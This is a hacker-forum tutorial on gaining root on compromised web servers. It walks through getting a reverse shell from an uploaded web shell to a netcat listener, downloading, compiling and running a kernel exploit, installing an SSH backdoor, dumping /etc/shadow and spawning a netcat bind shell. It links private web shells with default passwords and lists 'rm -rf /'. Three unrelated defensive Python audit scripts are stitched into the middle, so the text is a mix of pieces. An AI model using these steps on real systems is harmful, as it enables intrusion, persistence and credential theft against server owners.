# Things you need-
=> A Shell on a website
=> An Exploit
=> Log cleaner
=> Ssh Backdoor
=> Netcat
=> A Brain
=> Get these from Google ;) lolz
# What is rooting ?
A. Getting access to the user "root", the main admin (superuser) account of the server.
# What is the need of rooting ?
A. Getting Juicy info :)
Now I begin,
# Getting Backconnection to the server-
=> Copy the Netcat directory to C:\
=> Open command prompt, type: CD C:\NETCAT
It'll look like this:
[code]
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Ash>cd c:\netcat
c:\netcat>
[/code]
=> Now Type: nc -l -v -p 2121
It'll look like-
[code]
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...
[/code]
=> Open your shell in your browser and go to the backconnection tab; if it is not there, get a shell like "B374k" or any other,
that's your choice.
=> Specify your IP & port as 2121, press connect, and you'll get a shell to the server; you can give commands to the server through that shell.
# Getting a Right exploit for the server-
=> Type: uname -a & hit enter.
It'll look something like this:
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
[/code]
=> It shows the kernel version of the server is: 2.6.18-194.26.1.el5
& the build year is 2010.
=> You need to find a perfect exploit for it. you can find them at-
# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com
# Leetupload.com
# Compiling & executing exploit-
=> Now I've got an exploit, & it is written in C. So I can't execute it by just uploading it; I need to compile it first.
=> Before proceeding further, cd into the tmp directory, coz it is always writable. So type: cd /home/XXXXX/public_html/tmp
// The path can be different, replace it with yours.
=> So first I'll get the exploit on the server, so I type: wget http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just using it to show you.
It'll look something Like this-
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ wget http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/2010-exploits/exploit.c
Resolving www.exploitsite.net... 199.58.192.192
Connecting to www.exploitsite.net|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'
0K .......... .... 100% 189K=0.08s
2011-01-25 08:21:44 (189 KB/s) - `exploit.c' saved [15088/15088]
[/code]
=> Now change the permissions of the exploit to 777.
Type: chmod 777 exploit.c
It may look like:
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ chmod 777 ImpelDown.c
[/code]
=> Now the exploit is On my server, I just need to compile & execute it.
So, I'll give the command: gcc -o exploit exploit.c
It'll compile & save the exploit as => exploit
It may look like-
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ gcc -o exploit exploit.c
[/code]
=> Next step is to execute it So we'll type: ./exploit
It may look like:
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ ./exploit
: here it'll show different process...
: #
: #
got root you m0f0 !!
[/code]
=> Now it says got root. Let's check if it's true,
Type: id
It may look like
[code]
uid=0(saijyoti) gid=0(saijyoti) groups=0(root)
[/code]
=> Which Means I got root :)
# Installing Backdoor-
=> Type: wget www.urlofbackdoor.com/sshdoor.zip
=> Then type: unzip sshdoor.zip
=> Then: cd sshdoor
=> Then type: ./run pass port
^ replace pass with your password, & port with a port number.
=> Now connect with putty & enjoy root privileges. ;)
========================
# Understanding /etc/shadow & /etc/passwd
=> If required, get the contents of /etc/passwd & /etc/shadow
using this command => cat /etc/passwd
and similarly, cat /etc/shadow
=> The /etc/shadow file stores the actual password, in encrypted (hashed) form, for each user's account, with additional properties related to the user's password, i.e. it stores the secure user account information.
All fields are separated by a colon (:). It contains one entry per line for each user listed in the /etc/passwd file.
=> If you open /etc/passwd, it'll show you something like this
root:x: .....
and so on...
where root is the username & x means the password is saved in the /etc/shadow file...
=> Now, if you open the shadow file, you will see something like this
r00t:encrypted pass: last pass change: & bla bla bla
The encrypted password consists of 13 to 24 characters from the 64-character alphabet a through z,
A through Z, 0 through 9, . and /. Optionally it can start with a "$" character.
This means the encrypted password was generated using another (not DES) algorithm.
For example, if it starts with "$1$" it means the MD5-based algorithm was used.
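The field layout and hash prefixes described above are easy to check mechanically. The following is an added example, not code from the original tutorial: it parses /etc/passwd and /etc/shadow text, names the hash scheme from the "$1$"/"$6$"-style prefix (falling back to the 13-character DES form), and flags the account-hygiene problems an administrator audits for: empty password fields, weak schemes, and extra UID 0 accounts. It also covers the `cut -d: -f1,2,3 /etc/passwd | grep ::` check from the command list further down. The sample entries and hash strings are constructed placeholders, not real hashes.

```python
"""Added example (not from the original tutorial): parse /etc/passwd and
/etc/shadow text and flag account-hygiene problems such as empty password
fields, weak hash schemes and extra UID 0 accounts.
The sample entries are constructed; the hash strings are NOT real hashes."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# crypt(5) prefixes.  A field with no "$" prefix and exactly 13 characters
# from the ./0-9A-Za-z alphabet is the traditional DES scheme described above.
HASH_PREFIXES = {
    "$1$": "MD5",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "SHA-256",
    "$6$": "SHA-512",
    "$y$": "yescrypt",
}
DES_RE = re.compile(r"[./0-9A-Za-z]{13}")
WEAK_SCHEMES = {"DES", "MD5"}   # fast to brute-force; should be migrated


def classify_hash(hash_field: str) -> str:
    """Return the hash scheme name, or 'empty' / 'locked' / 'unknown'."""
    if hash_field == "":
        return "empty"            # login needs no password at all
    if hash_field[0] in "!*":
        return "locked"           # password login disabled
    for prefix, name in HASH_PREFIXES.items():
        if hash_field.startswith(prefix):
            return name
    if DES_RE.fullmatch(hash_field):
        return "DES"
    return "unknown"


def parse_colon_file(text: str, nfields: int) -> Dict[str, List[str]]:
    """One entry per line, fields separated by ':', keyed by user name."""
    entries: Dict[str, List[str]] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        parts += [""] * (nfields - len(parts))   # tolerate short lines
        entries[parts[0]] = parts
    return entries


@dataclass
class AccountAudit:
    name: str
    uid: int
    shell: str
    scheme: str
    findings: List[str] = field(default_factory=list)


def audit(passwd_text: str, shadow_text: str) -> List[AccountAudit]:
    """Cross-check every passwd entry against its shadow entry."""
    passwd = parse_colon_file(passwd_text, 7)
    shadow = parse_colon_file(shadow_text, 9)
    results = []
    for name, p in passwd.items():
        uid = int(p[2]) if p[2].isdigit() else -1
        shadow_hash = shadow[name][1] if name in shadow else None
        scheme = "unknown" if shadow_hash is None else classify_hash(shadow_hash)
        acct = AccountAudit(name, uid, p[6], scheme)
        if p[1] != "x":
            # passwd's 2nd field should be 'x' (the hash lives in shadow);
            # an empty field here is what `grep ::` on /etc/passwd catches
            acct.findings.append("empty password field in /etc/passwd" if p[1] == ""
                                 else "hash stored in world-readable /etc/passwd")
        if uid == 0 and name != "root":
            acct.findings.append("extra UID 0 account")
        if shadow_hash is None:
            acct.findings.append("no /etc/shadow entry")
        elif scheme == "empty":
            acct.findings.append("no password set in /etc/shadow")
        elif scheme in WEAK_SCHEMES:
            acct.findings.append(f"weak password hash ({scheme})")
        results.append(acct)
    return results


# Constructed sample data (hash values are placeholders, not real hashes).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
r00t:x:0:0::/root:/bin/bash
webadmin:x:500:500::/home/webadmin:/bin/bash
guest::1001:1001::/home/guest:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$6$saltsalt$PLACEHOLDERsha512hashPLACEHOLDERsha512hashPLACEHOLDERsha5:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
r00t:$1$abcdefgh$PLACEHOLDERmd5hash0123:18000:0:99999:7:::
webadmin:ab4QLyXzUv9Mk:15000:0:99999:7:::
guest::18000:0:99999:7:::
"""

if __name__ == "__main__":
    for acct in audit(SAMPLE_PASSWD, SAMPLE_SHADOW):
        status = "; ".join(acct.findings) or "ok"
        print(f"{acct.name:<10} uid={acct.uid:<5} {acct.scheme:<9} {status}")
```

Run on a real host with `audit(open("/etc/passwd").read(), open("/etc/shadow").read())` as root; the second UID 0 account (`r00t`) is exactly the kind of entry the ssh backdoor step of this tutorial leaves behind, which is why the audit keys on UID rather than on the name.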
=> Methods to execute exploits written in other languages-
#C exploit-
gcc -o exploit exploit.c
chmod +x exploit
./exploit
#Perl-
perl exploit.pl
#python-
python exploit.py
#php-
php exploit.php
#zip
unzip exploit.zip
./run
Part-2:
=======
=> Aim of this paper- To tell how to get r00t if you don't get a backconnection to the server.
# Thing you need-
An ajax command shell or a cgi-bin telnet shell.
I've both; the AJAX one is by Team ICW & the other one is by Team UNIX.
You can do everything as I stated above in part-1, simply use these command shells to execute l33t exploits.
# PHP ajax command shell by Team ICW- http://pastie.org/private/eskwfygw4dqcbkf3tsw
Default uname and pass is => indishell
# Cgi-bin telnet shell by Team UNIX- http://pastie.org/private/hipxlweusrrlpsdllsjnlq
Default pass is jeen. save it as jen.jeen
These are my private shells, please don't post it in public forums.
===============================================
=> Backconnecting with Netcat-
The server can firewall all your BC traffic, so try using netcat.
=> Upload the netcat C source, compile it as I stated above & set the permissions to 777.
Then type this => ./nc -l -p port -e /bin/sh
Replace port with your open port...
and your shell will be spawned....
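From the defender's side, both netcat patterns in this paper leave a very recognisable trace in the process table. The following is an added example, not code from the original post: it parses `ps aux` output and flags netcat (nc/ncat/netcat) processes that hand a shell to a connection via `-e`, `-c`, `--exec` or `--sh-exec`, distinguishing the listening `-l` bind-shell form shown above from the outbound reverse-connect form used in part-1, and ranks hits owned by a web-server account highest. The process lines and the set of web-server user names are constructed assumptions.

```python
"""Added example (not from the original post): scan a `ps aux` listing for
netcat processes that hand a shell to the network, i.e. the
`./nc -l -p <port> -e /bin/sh` bind pattern above and its reverse-connect
twin.  The process lines are constructed."""
import shlex
from typing import Dict, List, Optional

NC_NAMES = {"nc", "netcat", "ncat", "nc.traditional", "nc.openbsd"}
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ksh", "cmd.exe"}
WEB_USERS = {"apache", "www-data", "nobody", "httpd"}   # assumption: site accounts


def parse_ps_line(line: str) -> Optional[Dict[str, object]]:
    """ps aux columns: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND."""
    parts = line.split(None, 10)
    if len(parts) < 11 or not parts[1].isdigit():
        return None                         # header or truncated line
    return {"user": parts[0], "pid": int(parts[1]), "cmd": parts[10]}


def nc_shell_indicator(cmd: str) -> Optional[str]:
    """Describe the shell hand-off in a netcat command line, or None."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        argv = cmd.split()
    if not argv or argv[0].rsplit("/", 1)[-1] not in NC_NAMES:
        return None
    prog = argv[0].rsplit("/", 1)[-1]
    # '-l' (possibly bundled, e.g. -lvp) means it listens: a bind shell;
    # otherwise it dials out to a remote listener: a reverse shell.
    listening = any(a.startswith("-") and not a.startswith("--") and "l" in a[1:]
                    for a in argv[1:])
    for i, arg in enumerate(argv[1:], start=1):
        if arg in EXEC_FLAGS and i + 1 < len(argv):
            target = argv[i + 1]
            if target.rsplit("/", 1)[-1] in SHELL_NAMES:
                return f"{'bind' if listening else 'reverse'} shell: {prog} {arg} {target}"
    return None


def scan_ps(text: str) -> List[Dict[str, object]]:
    """Return one finding per suspicious process, most severe first."""
    findings = []
    for line in text.splitlines():
        proc = parse_ps_line(line)
        if proc is None:
            continue
        hit = nc_shell_indicator(str(proc["cmd"]))
        if hit is None:
            continue
        # a shell handed out by the web-server account is the scenario this
        # tutorial describes: a PHP shell backconnecting out of the site
        severity = "high" if proc["user"] in WEB_USERS else "medium"
        findings.append({**proc, "indicator": hit, "severity": severity})
    findings.sort(key=lambda f: (f["severity"] != "high", f["pid"]))
    return findings


# Constructed `ps aux` sample: two netcat shells plus benign noise.
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1  19356  1544 ?        Ss   Jan25   0:01 /sbin/init
apache    2210  0.0  0.5 221000 11000 ?        S    08:20   0:00 /usr/sbin/httpd
apache    2315  0.0  0.1   3920   600 ?        S    08:21   0:00 ./nc -l -p 2121 -e /bin/sh
apache    2318  0.0  0.1   3920   600 ?        S    08:21   0:00 nc 203.0.113.5 2121 -e /bin/bash
admin     2400  0.0  0.1   5000   900 pts/0    S    08:22   0:00 nc -zv localhost 22
admin     2401  0.0  0.1   5000   900 pts/0    S    08:22   0:00 /bin/sh -c echo hello
"""

if __name__ == "__main__":
    for f in scan_ps(SAMPLE_PS):
        print(f"[{f['severity']}] pid={f['pid']} user={f['user']} {f['indicator']}")
```

Feed it live data with `scan_ps(subprocess.run(["ps", "aux"], capture_output=True, text=True).stdout)`; a port scan like `nc -zv localhost 22` is deliberately left alone because it never passes a shell to the connection.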
==================================================
Enjoy...& keep loving m3...
# Important cmds-
./../mainfile.php - Config file.
ls -la - Lists directory contents, including hidden files.
ifconfig {eth0 etc} - ipconfig equivalent.
ps aux - Shows running processes.
gcc in_file -o out_file - Compiles a C file.
cat /etc/passwd - Lists accounts.
sudo - "superuser do": runs a command as root, provided you have perms in /etc/sudoers.
id - Tells you what user you're logged in as.
which wget curl w3m lynx - Checks which downloaders are present.
uname -r - Shows the kernel release info (or) cat /etc/release.
uname -a - Shows all kernel info (or) cat /etc/issue.
last -30 - Shows the last 30 logins with their IPs; change the number as desired.
useradd - Creates a new user account.
usermod - Modifies a user account.
w - Shows who is currently logged on.
locate password.txt - Locates password.txt via the locate database; * wildcards can be used.
rm -rf / - Please be careful with this command, I cannot stress this enough.
arp -a - Lists other machines on the same subnet (ARP cache).
lsattr -va - Lists file attributes on a Linux second extended (ext2) file system.
find / -type f -perm -04000 -ls - Finds suid files.
find . -type f -perm -04000 -ls - Finds suid files in the current dir.
find / -type f -perm -02000 -ls - Finds all sgid files.
find / -perm -2 -ls - Finds all world-writable files and folders.
find . -perm -2 -ls - Finds all world-writable files and folders in the current dir.
find / -type f -name .bash_history - Finds bash history files.
netstat -an | grep -i listen - Shows open (listening) ports.
cut -d: -f1,2,3 /etc/passwd | grep :: - From memory: finds a user with no pass (empty password field).
find /etc/ -type f -perm -o+w 2> /dev/null - Finds world-writable files in /etc (is /etc/passwd writable?).
cat /proc/version /proc/cpuinfo - CPU info.
locate gcc - Finds gcc if installed.
set - Displays shell/system variables.
echo $PATH - Echoes the current PATH.
lsmod - Lists loaded kernel modules.
mount / df - Checks mounted file systems.
rpm -qa - Checks the patch level (installed packages) on RedHat 7.0.
dmesg - Checks hardware info.
cat /etc/syslog.conf - Log file configuration.
uptime - Uptime check.
cat /proc/meminfo - Memory check.
find / -type f -perm -4 -print 2> /dev/null - Finds world-readable files.
find / -type f -perm -2 -print 2> /dev/null - Finds world-writable files.
chmod ### $folder - Chmods a folder (### is the octal mode).
ls -l -b - Verbosely lists directories (-b escapes non-printable characters in names).
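The `find -perm` one-liners in the list above are the same checks a hardening audit runs, and they are easier to reason about as one scanner with explicit mode tests. The following is an added example, not part of the original list: it walks a directory tree and buckets setuid files (`-perm -04000`), setgid files (`-perm -02000`) and world-writable entries (`-perm -2`), treating a sticky world-writable directory like /tmp as expected rather than a finding. It builds and scans a throwaway temporary tree so it can be run safely; the file names and modes in that fixture are constructed.

```python
"""Added example (not from the original list): one scanner that performs the
setuid / setgid / world-writable checks the `find -perm` one-liners above do,
run here over a constructed directory tree instead of / so it is safe to try."""
import os
import stat
import tempfile
from typing import Dict, List


def audit_tree(root: str) -> Dict[str, List[str]]:
    """Walk `root` and bucket risky modes like the find commands above:
    -perm -04000 (setuid), -perm -02000 (setgid), -perm -2 (world-writable)."""
    found: Dict[str, List[str]] = {"setuid": [], "setgid": [], "world_writable": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)             # lstat: never follow symlinks
            except OSError:
                continue
            mode = st.st_mode
            if stat.S_ISLNK(mode):
                continue
            rel = os.path.relpath(path, root)
            if stat.S_ISREG(mode) and mode & stat.S_ISUID:
                found["setuid"].append(rel)
            if stat.S_ISREG(mode) and mode & stat.S_ISGID:
                found["setgid"].append(rel)
            # a sticky, world-writable directory (like /tmp) is by design;
            # anything else writable by "other" is a finding
            sticky_dir = stat.S_ISDIR(mode) and bool(mode & stat.S_ISVTX)
            if mode & stat.S_IWOTH and not sticky_dir:
                found["world_writable"].append(rel)
    for bucket in found.values():
        bucket.sort()
    return found


def build_sample_tree() -> str:
    """Constructed fixture: a throwaway tree with one file per mode of interest."""
    root = tempfile.mkdtemp(prefix="permaudit_")
    files = {
        "bin/suidtool": 0o4755,   # setuid binary
        "bin/sgidtool": 0o2755,   # setgid binary
        "bin/normal":   0o755,    # plain executable
        "etc/passwd":   0o666,    # world-writable config: the classic finding
        "etc/hosts":    0o644,    # fine
    }
    for rel, mode in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), mode=0o755, exist_ok=True)
        with open(path, "w") as fh:
            fh.write("sample\n")
        os.chmod(path, mode)                  # explicit: independent of umask
    os.makedirs(os.path.join(root, "tmp"), mode=0o755)
    os.chmod(os.path.join(root, "tmp"), 0o1777)       # sticky: expected
    os.makedirs(os.path.join(root, "uploads"), mode=0o755)
    os.chmod(os.path.join(root, "uploads"), 0o777)    # not sticky: finding
    return root


if __name__ == "__main__":
    report = audit_tree(build_sample_tree())
    for bucket, paths in report.items():
        print(f"{bucket}: {', '.join(paths) or '(none)'}")
```

Pointing `audit_tree("/")` at a real host reproduces the three `find` commands in one pass; a world-writable /etc/passwd or an unexpected setuid binary in a web-writable tmp directory are the findings that matter in the scenario this paper describes.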